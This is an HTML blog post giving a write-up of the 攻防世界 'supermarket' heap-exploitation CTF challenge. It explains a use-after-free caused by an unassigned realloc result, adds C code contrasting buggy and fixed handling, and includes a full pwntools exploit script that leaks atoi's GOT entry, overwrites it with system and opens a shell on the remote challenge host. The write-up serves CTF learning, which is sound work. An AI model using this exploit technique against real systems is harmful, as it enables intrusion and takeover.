<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="browsermode" content="application">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-title" content="Axojhf的博客">
<meta name="apple-mobile-web-app-status-bar-style" content="default">
<meta name="msapplication-navbutton-color" content="#666666">
<meta name= "format-detection" content="telephone=no" />





  <meta name="keywords" content="Writeup, nlvi" />


<link rel="apple-touch-startup-image" media="(device-width: 375px)" href="assets/apple-launch-1125x2436.png">
<link rel="apple-touch-startup-image" media="(orientation: landscape)" href="assets/apple-touch-startup-image-2048x1496.png">

<link rel="stylesheet" href="/blog/style/style.css">

<script>
  var nlviconfig = {
    title: "Axojhf的博客",
    author: "Axojhf",
    baseUrl: "/blog/",
    theme: {
      scheme: "banderole",
      lightbox: true,
      animate: true,
      search: true,
      friends: false,
      reward: false,
      pjax: false,
      lazy: false,
      toc: true
    }
  }
</script>




    
<link rel="stylesheet" href="/blog/script/lib/lightbox/css/lightbox.min.css">





    
<link rel="stylesheet" href="/blog/syuanpi/syuanpi.min.css">
















<style>
@font-face {
  font-family: "Allura";
  src: url('/blog/font/allura/allura.ttf');
}
</style>

  <title> 攻防世界 supermarket Challenge Writeup · Axojhf's Blog </title>
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
  <div class="container">
    <header class="header" id="header">
  <div class="header-wrapper">
    <div class="logo">
  <div class="logo-inner syuanpi tvIn" style="display:none;">
    <h1><a href="/blog/">Axojhf's Blog</a></h1>
    
  </div>
</div>

    <nav class="main-nav">
  
  <ul class="main-nav-list syuanpi tvIn">
  
    <li class="menu-item">
      <a href="javascript:;" id="search-btn" aria-label="Search">
        <i class="iconfont icon-search"></i>
      </a>
    </li>
  
  
  
    
  
    <li class="menu-item">
      <a href="/blog/" id="article">
        <span class="base-name">
          
            ARTICLE
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/archives" id="archives">
        <span class="base-name">
          
            ARCHIVES
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="javascript:;" id="tags">
        <span class="base-name">
          
            TAGS
          
        </span>
      </a>
    </li>
  
  
    
  
    <li class="menu-item">
      <a href="/blog/about" id="about">
        <span class="base-name">
          
            ABOUT
          
        </span>
      </a>
    </li>
  
  
  </ul>
  
</nav>

  </div>
</header>



    <div class="container-inner" style="display:none;">
      <main class="main" id="main">
        <div class="main-wrapper">
          
    
  
  <article class="
  post
   is_post 
  ">
    <header class="post-header">
      <div class="post-time syuanpi fadeInRightShort back-1">
        <div class="post-time-wrapper">
          
          <time>2020-06-02</time>
          
        </div>
      </div>
      <h2 class="post-title syuanpi fadeInRightShort back-2">
        
          攻防世界 supermarket Challenge Writeup
        
      </h2>
    </header>
    <div class="post-content syuanpi fadeInRightShort back-3">
      
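        <h1 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h1><p>This challenge is a heap-exploitation pwn problem. To be honest, I am only just getting started with heap exploitation and do not understand it deeply yet, so parts of my reading of this challenge may be inaccurate; corrections are welcome.<br>The core of the challenge is understanding the realloc function and working out how to construct the most suitable memory chunk to exploit.<br>While solving it I relied heavily on <a href="https://blog.csdn.net/seaaseesa/article/details/103093182" target="_blank" rel="noopener">攻防世界 PWN: Supermarket solution</a>.</p>
<p>(I am still a novice, so some of my understanding may not be thorough and some statements may not be rigorous. Corrections are welcome, and please bear with me.)</p>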
<a id="more"></a>

<h1 id="解题过程"><a href="#解题过程" class="headerlink" title="Solution"></a>Solution</h1><p>Program information:<br><img src="https://img-blog.csdnimg.cn/20200204160452961.png" alt=""><br>Analysing the program shows its main features:<br><img src="https://img-blog.csdnimg.cn/20200204160824239.jpg" alt=""><br>All of them are dispatched from a switch statement:<br><img src="https://img-blog.csdnimg.cn/20200204161033898.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0F4b2poZg==,size_16,color_FFFFFF,t_70" alt=""><br>From the program's behaviour we can draw the structure it uses to store its data:<br><img src="https://img-blog.csdnimg.cn/20200204185329589.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0F4b2poZg==,size_16,color_FFFFFF,t_70" alt=""><br>(The program also has an array that can hold 15 pointers to “name”.)</p>
<p>Analysis shows that none of the important string-input statements leaves room for an overflow, so a stack overflow is probably not viable.<br>Only after reading someone else's writeup did I realise that the real weak spot is at the realloc call:<br><img src="https://img-blog.csdnimg.cn/20200204173002806.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0F4b2poZg==,size_16,color_FFFFFF,t_70" alt=""></p>
<blockquote>
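<p>What the realloc function does:<br>It first checks whether there is enough contiguous space at the current pointer. If there is, it enlarges the region that mem_address points to and returns mem_address.<br>If there is not enough space, it first allocates space of the size given by newsize, copies the original data from start to finish into the newly allocated region, and then frees the region that mem_address originally pointed to (note: the original pointer is freed automatically, there is no need to call free), and at the same time <strong>returns the start address of the newly allocated region</strong>. That is, the address of the reallocated memory block.</p>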
</blockquote>
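<p>In other words, if the memory requested for a pointer is larger than the contiguous space available next to the current allocation, the return value of realloc must be assigned back to that pointer for the growth to take effect.<br>The code on line 12 of the figure above does not do this, so there is a UAF vulnerability!</p>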
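<p>The realloc misuse described above, next to a corrected update routine, as an added C example that is not code from the original post or from the challenge binary. The struct layout is inferred from the payload in the script on this page, and all function names are hypothetical.</p>

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed record layout, inferred from the write-up's payload:
   16-byte name, price, descrip_size, description pointer. */
struct commodity {
    char  name[16];
    int   price;
    int   descrip_size;
    char *description;
};

/* Hypothetical helper: build a record with a zeroed description buffer. */
int commodity_init(struct commodity *c, const char *name, int price, int size)
{
    if (size <= 0) return -1;
    memset(c, 0, sizeof *c);
    strncpy(c->name, name, sizeof c->name - 1);
    c->price = price;
    c->description = calloc(1, (size_t)size);
    if (c->description == NULL) return -1;
    c->descrip_size = size;
    return 0;
}

/* BUGGY (the pattern the post describes): the pointer realloc() returns is
   never written back into the record. If the block moved, c->description is
   left pointing at freed memory. Returns 1 when that happened, 0 otherwise.
   The live block is handed back through *live only so the demo can repair c. */
int resize_buggy(struct commodity *c, int new_size, char **live)
{
    uintptr_t stored = (uintptr_t)c->description;
    char *p = realloc(c->description, (size_t)new_size);
    if (p == NULL) { *live = c->description; return 0; }
    c->descrip_size = new_size;          /* size updated, pointer is not */
    *live = p;
    return (uintptr_t)p != stored;
}

/* FIXED: keep the result in a temporary, leave the record untouched on
   failure, and commit pointer and size together on success. */
int resize_fixed(struct commodity *c, int new_size)
{
    if (new_size <= 0) return -1;
    char *p = realloc(c->description, (size_t)new_size);
    if (p == NULL) return -1;            /* old block is still valid */
    if (new_size > c->descrip_size)      /* zero the newly added tail */
        memset(p + c->descrip_size, 0, (size_t)(new_size - c->descrip_size));
    c->description = p;
    c->descrip_size = new_size;
    return 0;
}

/* Demo with the sizes used in the write-up (128 -> 144, neighbour in between).
   Returns 1 if the buggy path left a stale pointer on this allocator. */
int demo_stale_pointer(void)
{
    struct commodity a, guard;
    char *live = NULL;
    if (commodity_init(&a, "1", 8, 128) || commodity_init(&guard, "0", 7, 10))
        return -1;
    int stale = resize_buggy(&a, 144, &live);
    a.description = live;                /* repair before any further use */
    free(a.description);
    free(guard.description);
    return stale;
}
```

<p>Whether demo_stale_pointer() reports 1 depends on the allocator; resize_fixed() is correct either way because it never keeps a pointer that realloc may have freed.</p>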
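<p>So we only need to create one of the structures above (struct 1 from here on), use realloc to reallocate the memory of struct 1's description, and then create another structure (struct 2 from here on) so that struct 2 is allocated in the memory freed from struct 1's description.</p>
<p>The first idea is naturally to use a fastbin-sized chunk, but that happens not to work here. The function that edits the description only reads description_size - 1 bytes of data, and the descrip pointer field sits right at the end, so one of its bytes would be set to 0. In addition, the function that implements “add a commodity” requests 28 bytes for this structure, so the allocated malloc_chunk comes to exactly 32 bytes + 4 bytes (the last 4 bytes can be taken from the prev_size of the next chunk). That means that even if we realloc() 29 bytes, a 32-byte chunk will no longer be allocated, so fastbin cannot be used!<br>For convenience, description_size can be set to an unsorted-bin size. We then find a chance to leak atoi's GOT entry, and after that, by editing struct 2, overwrite atoi's GOT entry with the address of system (mainly so that entering /bin/sh afterwards gives a shell).<br>Script:</p>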
<figure class="highlight python"><table><tr><td class="code"><pre># -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
context(os='linux', arch='i386')  # 32-bit target: every value below is packed with p32/u32
pwn = remote('111.198.29.45', 00000)  # port left as written in the original post


def add(name, price, descrip_size, description):
    pwn.sendlineafter('your choice&gt;&gt; ', '1')
    pwn.sendlineafter('name', name)
    pwn.sendlineafter('price:', price)
    pwn.sendlineafter('descrip_size:', descrip_size)
    pwn.sendlineafter('description:', description)


def delete(name):
    pwn.sendlineafter('your choice&gt;&gt; ', '2')
    pwn.sendlineafter('name:', name)


def change(name, new_size, new_description):
    pwn.sendlineafter('your choice&gt;&gt; ', '5')
    pwn.sendlineafter('name:', name)
    pwn.sendlineafter('descrip_size:', new_size)
    pwn.sendlineafter('description:', new_description)


add('1', '8', '128', '')      # struct 1, with a 128-byte description
add('0', '7', '10', 'OK')     # keeps the chunk from being merged
change('1', '144', '')        # realloc moves the description; struct 1 keeps the old pointer
add('2', '9', '10', '')       # struct 2 is allocated in the freed description block
# Overlay for struct 2: name, price, descrip_size, description pointer.
# Bytes literals so the concatenation with p32() also works on Python 3.
payload = b'2'.ljust(16, b'\x00') + p32(20) + p32(0x20) + p32(0x804b048)
change('1', '144', payload)   # written through struct 1's stale description pointer
pwn.sendlineafter('your choice&gt;&gt; ', '3')
pwn.recvuntil('price.20, des.')
atoi_add = pwn.recvuntil('\n')[:-1]
# To get the address of system I first leaked the address of atoi once,
# then looked up the matching libc at https://libc.blukat.me/
# and obtained the offset between atoi and system, 0xd8f0.
system_add = u32(atoi_add) + 0xd8f0
log.info('system_add: ' + hex(system_add))
change('2', '32', p32(system_add))  # atoi's GOT entry now holds the address of system
pwn.interactive()
pwn.close()
</pre></td></tr></table></figure>
      
    
    </div>
    
      <div class="post-tags syuanpi fadeInRightShort back-3">
      
        <a href="/blog/tags/Writeup/">Writeup</a>
      
      </div>
    
    
      

      
  <hr class="copy-line">
  <div class="post-copyright">
    <div class="copy-author">
      <span>Author:</span>
      <span>Axojhf</span>
    </div>
    <div class="copy-url">
      <span>URL:</span>
      <a href="http://xiaoaoaode.gitee.io/blog/2020/06/02/471a08d2/">http://xiaoaoaode.gitee.io/blog/2020/06/02/471a08d2/</a>
    </div>
    <div class="copy-origin">
      <span>Source:</span>
      <a href="http://xiaoaoaode.gitee.io/blog">http://xiaoaoaode.gitee.io/blog</a>
    </div>
    <div class="copy-license">
      
      Copyright belongs to the author. Please contact the author for permission before reposting.
    </div>
  </div>

    
  </article>
  
    


    
  <i id="com-switch" class="iconfont icon-down jumping-in long infinite" style="font-size:24px;display:block;text-align:center;transform:rotate(180deg);"></i>
  <div class="post-comments" id="post-comments" style="display: block;margin: auto 16px;">
    

    
    

    

  </div>



  
  
    
  
  <aside class="post-toc">
    <div class="title"><span>Contents</span></div>
    <div class="toc-inner">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-text">Preface</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#解题过程"><span class="toc-text">Solution</span></a></li></ol>
    </div>
  </aside>



  


        </div>
      </main>
      <footer class="footer syuanpi fadeIn" id="footer">
  <hr>
  <div class="footer-wrapper">
    <div class="left">
      <div class="contact-icon">
  
  
</div>

    </div>
    <div class="right">
      <div class="copyright">
    <div class="info">
        <span>&copy;</span>
        <span>2020 ~ 2020</span>
        <span>❤</span>
        <span>Axojhf</span>
    </div>
    <div class="theme">
        <span>
            Powered by
            <a href="http://hexo.io/" target="_blank" rel="noopener">Hexo </a>
        </span>
        <span>
            Theme
            <a href="https://github.com/ColMugX/hexo-theme-Nlvi" target="_blank" rel="noopener"> Nlvi </a>
        </span>
    </div>
    
</div>

    </div>
  </div>
</footer>
    </div>

  </div>




<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>



  <script></script>
  <script src="/blog/script/lib/lightbox/js/lightbox.min.js" async></script>











  
<script src="/blog/script/scheme/banderole.js"></script>




<script src="/blog/script/bootstarp.js"></script>



<script>
if (nlviconfig.theme.toc) {
  setTimeout(function() {
    if (nlviconfig.theme.scheme === 'balance') {
      $("#header").addClass("show_toc");
    } else if (nlviconfig.theme.scheme === 'banderole') {
      $(".container-inner").addClass("has_toc");
      $(".post-toc .title").addClass("show");
      $(".toc-inner").addClass("show");
    }
  }, 1000);
}
</script>



</body>
</html>
